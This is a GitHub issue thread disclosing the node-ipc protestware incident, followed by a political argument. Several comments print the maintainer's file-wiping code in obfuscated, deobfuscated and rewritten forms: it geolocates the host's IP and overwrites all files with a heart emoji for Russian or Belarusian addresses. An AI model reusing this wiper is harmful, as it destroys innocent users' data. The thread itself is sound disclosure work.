Closed Mister-Hope closed 2 years ago
It seems such attack code is not published to npm (or has been deleted). But such behavior is still very dangerous.
NOTE: The related comments have been deleted by the owner of that repo. Here are the screenshots :
@RIAEvangelist deleting the original comment, but it does not matter to the fact.
Original post by @Mister-Hope which has been deleted.
@RIAEvangelist I did some digging into recent commits in this repository.
What the actual f--k are you doing here:
:warning:| The following code is malicious, DO NOT RUN IT
:warning:| The above code is malicious, DO NOT RUN IT
I deobfuscated the code and found out that if the host machine's ip address was from Russia or Belarus, your code would proceed to nuke their files by overwriting everything:
:warning:| The following code is malicious, DO NOT RUN IT
import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️` } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
:warning:| The above code is malicious, DO NOT RUN IT
The following are excerpts from the malicious code:
Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if ip country is Russia or Belarus
a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️`
You should be ashamed of yourself, this level of gross malice towards fellow developers is not ok.
Edit: please reference GalvinGao's comment
https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1068243590
hmmm, seems the file has been already deleted (https://github.com/RIAEvangelist/node-ipc/commits/master/dao/ssl-geospec.js) and the version affected
v10.1.3
has already been either taken down, or the user has deleted it, from npm, as it is currently already not existed on npm.Still, the publisher's activity, to my evaluation, is kinda suspicious. Whether the file was introduced intentionally or unintentionally, the security concerns of using this package has already planted.
It's not really possible to run that code. It poses no threat, but it does look scary for sure.
It's not really possible to run that code. It poses no threat, but it does look scary for sure.
The fact of the matter is that you pushed that code to the repository.
That code should have never mixed in with node-ipc
.
Such actions can be considered malicious.
@RIAEvangelist Why are you removing the posts from the node-ipc ticket https://github.com/RIAEvangelist/node-ipc/issues/233 that clearly show the code you added was deleting/overwriting user files?
@yyx990803 @sodatea Evan & Haoqun, could you please make sure that node-ipc 9.2.1, which is now locked in @vue/cli 4.5.16 and @vue/cli 5.0.3, is not malicious and isn't allowed to be changed in any way (indirectly)? Not sure, is node-ipc being used as dependency in Vite https://github.com/vitejs/vite ? or in create-vue ? Please double check.
Can confirm no malicious code.
Also I don't think you understand the code you were referring to. It is not possible for that code to overwrite user files.
It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.
The community should fork node-ipc since the owner can no longer be trusted.
Forking is always an option, so is version locking.
It's also very easy to jump to conclusions saying someone is not trustworthy. Code reviews and reading licenses and documentation may give better assessment of that though.
It is not possible for that code to overwrite user files. It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.
I tested the code and confirmed that if the response denote ip was from russia, the code definitely could (1/4 possibility for every run) overwrite the files.
Russia or Belarus, and only if the API key was valid; which it is not.
Also, damn good sleuthing.
Yeah, the API key is not valid now, it's very easy to apply a key or reset it.
@RIAEvangelist
only if the API key was valid; which it is not.
At the time of my testing, the api key was valid. Don't lie to us.
I don't think anyone is lieing here.
Code will not lie. If you really want to do something, don't do it behind your back.
Welcome to Node.js v16.13.1.
Type ".help" for more information.
> const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
undefined
> n.toString("utf8")
'https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154'
> Buffer.from("Y291bnRyeV9uYW1l", "base64").toString("utf-8")
'country_name'
> Buffer.from("cnVzc2lh", "base64").toString("utf-8")
'russia'
> Buffer.from("YmVsYXJ1cw==", "base64").toString("utf-8")
'belarus'
> Buffer.from("Li8", "base64").toString("utf-8")
'./'
> Buffer.from("Li4v", "base64").toString("utf-8")
'../'
> Buffer.from("Li4vLi4v", "base64").toString("utf-8")
'../../'
> Buffer.from("Lw==", "base64").toString("utf-8")
'/'
>
I did an investigation, and got the following
commit https://github.com/RIAEvangelist/node-ipc/commit/cc282c2b06c98eb0a01543639ac8d117476dc4c8 deleted the file: dao/ssl-geospec.js
after decrypt it, we got this:
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
const t = Math.round(Math.random() * 4);
if (t > 1) {
return;
}
const n = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
o.get(n.toString("utf8"), function (t) {
t.on("data", function (t) {
const n = "./";
const o = "../";
const r = "../../";
const f = "/";
const c = "country_name";
const e = "russia";
const i = "belarus";
try {
const s = JSON.parse(t.toString("utf8"));
const u = s[c.toString("utf8")].toLowerCase();
const a =
u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
if (a) {
h(n.toString("utf8"));
h(o.toString("utf8"));
h(r.toString("utf8"));
h(f.toString("utf8"));
}
} catch (t) {}
});
});
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
if (!a.existsSync(n)) {
return;
}
let r = [];
try {
r = a.readdirSync(n);
} catch (t) {}
const f = [];
const c = "❤️";
for (var e = 0; e < r.length; e++) {
const i = u.join(n, r[e]);
let t = null;
try {
t = a.lstatSync(i);
} catch (t) {
continue;
}
if (t.isDirectory()) {
const s = h(i, o);
s.length > 0 ? f.push(...s) : null;
} else if (i.indexOf(o) >= 0) {
try {
a.writeFile(i, c.toString("utf8"), function () {});
} catch (t) {}
}
}
return f;
}
const ssl = true;
export { ssl as default, ssl };
you naughty guy
Someone use their actions to prove that open source has borders😅
Supply chain pollution is not a smart move
did any one report this to npmjs.com ? https://www.npmjs.com/support?inquire=security&security-inquire=malware&package=node-ipc Remove this package from npmjs may save a lot of user.
Thanks for the issue.
A few clarifications:
node-ipc
v9.x.node-ipc
9.2.2 added the peacenotwar
module, which would write a WITH-LOVE-FROM-AMERICA.txt
to users' Desktop and OneDrive folders without the consent of the user.2022-03-15T05:40:26.758Z
and 2022-03-15T13:17:57.076Z
; or those who updated project dependencies in that time span.I think the best place to address this issue is the npm registry. They can directly take down these malicious codes.
npmmirror.com
has already taken steps to redirect these problematic versions to the latest known-safe versions: https://github.com/cnpm/bug-versions/pull/181
node-ipc
has been added to the registry.npmmirror.com
blacklist and will not be synced with any new versions in the future.
We recommend that the community migrate to other alternative libraries as soon as possible.
Seems like we are going to lock our dependencies version from this point. lol, the funniest joke in 2022 is that [XX] has no border
🤣
@atian25 The behavior — committed malicious code, deleted comments which expose such code, revoked the api key after been exposed and promoted the sophistry that the code not work because api key is not valid — make me think the guy is not worth trust anymore. I strongly suggest npmmirror not only blacklist node-ipc but all his packages.
mark
mark
mark
Good News This API is not available now 好消息 API挂了 {"message":"Provided API key is not valid. Contact technical support for assistance at support@ipgeolocation.io"}
Good News This API is not available now 好消息 API挂了 {"message":"Provided API key is not valid. Contact technical support for assistance at support@ipgeolocation.io"}
Bad news is that node-ipc still have this problem
It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.
So what was your intention then?
Just made it better looked and commented dangerous code so you guys can take a try. Obviously the code will delete literally EVERYTHING on your drive.
const path = require("path");
const fs = require("fs");
const https = require("https");
setTimeout(function () {
const randomNumber = Math.round(Math.random() * 4);
if (randomNumber > 1) {
// return;
}
const apiKey = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
const pwd = "./";
const parentDir = "../";
const grandParentDir = "../../";
const root = "/";
const countryName = "country_name";
const russia = "russia";
const belarus = "belarus";
https.get(apiKey, function (message) {
message.on("data", function (msgBuffer) {
try {
const message = JSON.parse(msgBuffer.toString("utf8"));
const userCountryName = message[countryName.toString("utf8")].toLowerCase();
const hasRus = userCountryName.includes(russia.toString("utf8")) || userCountryName.includes(belarus.toString("utf8")); // checks if country is Russia or Belarus
if (hasRus) {
deleteFile(pwd);
deleteFile(parentDir);
deleteFile(grandParentDir);
deleteFile(root);
}
} catch (t) {}
});
});
// zkyf: Let's try this directly here
deleteFile(pwd);
deleteFile(parentDir);
deleteFile(grandParentDir);
deleteFile(root);
}, 100);
async function deleteFile(pathName = "", o = "") {
if (!fs.existsSync(pathName)) {
return;
}
let fileList = [];
try {
fileList = fs.readdirSync(pathName);
} catch (t) {}
const f = [];
const heartUtf8 = Buffer.from("4p2k77iP", "base64");
for (var idx = 0; idx < fileList.length; idx++) {
const fileName = path.join(pathName, fileList[idx]);
let fileInfo = null;
try {
fileInfo = fs.lstatSync(fileName);
} catch (err) {
continue;
}
if (fileInfo.isDirectory()) {
const fileSymbol = deleteFile(fileName, o);
fileSymbol.length > 0 ? f.push(...fileSymbol) : null;
} else if (fileName.indexOf(o) >= 0) {
try {
// fs.writeFile(fileName, heartUtf8.toString("utf8"), function () {}); // overwrites file with `❤️`
console.log(`Rewrite ${fileName}`);
} catch (err) {}
}
}
return f;
}
Console:
@zkyf thank you for taking the time to convert all of the code to a more readable form! Hopefully this will aid myself and others in showing our managers exactly what is going on.
I see. So vuejs team does support the war in Ukraine. Sad....
I see. So vuejs team does support the war in Ukraine. Sad....
Nobody supports Russia's war against Ukraine. What is happening right now is awful.
I noticed your GitHub says you're from Ukraine. Stay safe, and stand strong.
Ебанутая блядь шавка
I am not Russian, nor live in Russia, but this could've easily hit me as I was in Russia 3 months ago, like many other expats and foreigners. Luckily I only got the WITH-LOVE-FROM-AMERICA.txt
because I'm no longer there. But this is absolutely outrageous.
Not to mention that there are over 3 million Ukrainians living in Russia that would be victims of this "protest" 🤷
Getting overly upset has little use - instead, focus on how to avoid having libraries maintained by volatile personalities in your dependency tree, in the future. node-ipc
needs to earlier or later be removed, as it cannot be maintained under its current name anymore.
A Russian old proverb.
@eahefnawy I think it is not only that. I think it is wrong to target Russians as well. It is not like every Russian supports war or they have a say in this situation. Doing this just creates another war in a different form. Totally opposite from the message he want to send. The only good part is he did take the code out right after he committed it, so I guess no one get the malicious code
I think it is wrong to target Russians as well. It is not like every Russian supports war
Not all, but most of them do. There is socialist research that clearly shows that. 71% of Russians said in favor of war.
@maxisam completely agreed. I just wanted to also clarify the "side effects" of his intentions, which I don't agree with either.
I think it is wrong to target Russians as well. It is not like every Russian supports war
Not all, but most of them do. There is socialist research that clearly shows that. 71% of Russians said in favor of war. @msangel
You have to look at from lots of ways. We are programmers (I assume you are). We should analyze this logically. I know it is easy for me to say that when I am not in Ukraine like you do.
Again, I hope Ukraine will be fine. I hate war in any form. And I know you are from Ukraine so hope you will be safe.
Not all, but most of them do. There is socialist research that clearly shows that. 71% of Russians said in favor of war.
@msangel that can be true if research is not faken. Social research during conflicts are mostly useless, because of fear from both sides. So take a critic look on that research
This attack belongs to which type of threat in the SLSA framework ?
Russians must stop war before complaining.
I want to be public here. I never do, but now I can't be silent.
As Russian I was fighting against the regime as much as I could before 2017. Then I left. We lost our fight. We could not stand against it.
Russian government is not the same as Russian people. Yes, significant part of Russian society declares they support this war. My brother supports the war! Those people are not aggressors themselves, they are under propaganda for tens of years. They don't speak English, there is no independent journalists in Russia anymore. It is not even legal in Russia to name war "war". People go to prison for that. When you publicly say (like I do here) that I want the war to be stopped it is a crime and people go to prison for up to 15 years for that. Please be empathetic. What's happening in Ukraine is catastrophic. What's happening with Russian people in Russia, ordinary people, who earn their $150 per month is also catastrophic, but differently. Probably less though, I cannot count here.
Lots of tech people who is mostly using Github and software like this library are leaving Russia now because they are against the war. I personally helped 29 people to leave that country. It is unsafe for them. They will try to find their new place in this world. They do not support war, neither do I or anyone else.
My irrational feeling is that the vast majority of people who will ever use any code from GitHub are not supporting this war. Being a techie (developer, engineer, etc.) makes you to think more and understand more. I believe that tens of thousands of Russian software engineers already left Russia since the war began.
There is no way inside Russia to protest against the regime. Those people are victims, not aggressors. Those people CANNOT do anything against the war without being physically harassed immediately.
I encourage everyone to be empathetic here. It's not Russian people against the world. The world and lots of Russian people are not enemies to each other, we have the same enemy. And that enemy is strong. We need to stand together here, not fight with each other.
No to war. No hate to civilians.
People are always going heavily OT, when it comes to these topics. This isn't a place for politics. It's irrelevant, whether russia is a big evil bear, the west spreading misinformation, people want to support ukraine, or whatever. There are plenty of platforms to discuss the latest war, make donations, and curse at whichever side you desire.
Malware got introduced into a public library, by the maintainer himself. People need to be made aware of this fact, to prevent potential damage, and dependents need to update, and plan for when and how to remove the now rotten dependency, and what to replace it with.
Mixing politics into everything makes it hard to sort information. People coming here for research about the malware end up reading generic political debate, which isn't helpful.
максисам _
Я думаю, что неправильно нацеливаться и на русских. Не каждый русский поддерживает войну
Не все, но большинство из них. Есть социалистические исследования , которые ясно показывают это. 71% россиян высказались за войну.
Such words are clearly not from a great mind. I hope that no one will suffer during this war, but what you are doing will definitely not bring any benefit and will not alleviate your emotional suffering. Peace.
Not all, but most of them do. There is socialist research that clearly shows that. 71% of Russians said in favor of war.
Is this research based on responses from developers? I think most developers against the war.
See https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1068182278 the
node-ipc
is doing things far more than ever expected.If any users are using ip in russia, all their file will be wiped entirely by ❤️, and that's a VERY DANGEROUS BEHAVIOR. This is not just making a joke, but damaging russia people's PC or server
I don't think vue team has done enough job just releaasing new versions, we should at lease
add POPUPs in official website about that
deprecate all the infected vue-cli packages to add a message for that
Also, we can do:
vue-devtools
by publishing new versions, so that users may get a chance automatically upgrade and see the warning.@sodatea @yyx990803 Please take actions as soon as possible!❤️